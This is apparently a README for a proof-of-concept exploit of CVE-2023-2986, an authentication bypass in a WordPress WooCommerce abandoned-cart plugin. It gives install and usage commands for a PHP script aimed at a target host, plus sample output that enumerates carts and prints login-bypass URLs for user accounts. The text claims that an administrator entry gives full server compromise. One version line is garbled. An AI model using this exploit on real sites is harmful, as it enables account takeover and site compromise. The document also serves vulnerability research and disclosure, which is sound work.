
Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress
Preuve de concept pour la vulnérabilité CVE-2023-2986 dans le plugin 'Abandoned Cart Lite for WooCommerce' pour WordPress
version <= 5.14.2version <= 5.15.15.15.05.15.2On pensait que la version 5.15.0 corrigeait le problème, mais j'ai découvert qu'elle n'était pas entièrement corrigée et la même chose a été mise à jour. Donc la version corrigée réelle est 5.15.2
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
Entrer l'URL dans le navigateur vous donnera accès au compte de l'utilisateur respectif. Si l'utilisateur administrateur WordPress lui-même a une entrée, cela donnera accès à la console d'administration, conduisant à une compromission totale du serveur WordPress.
Cette preuve de concept (POC) a été créée purement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destinée à être utilisée pour attaquer des systèmes sauf autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive de la POC. Utilisez-la de manière responsable.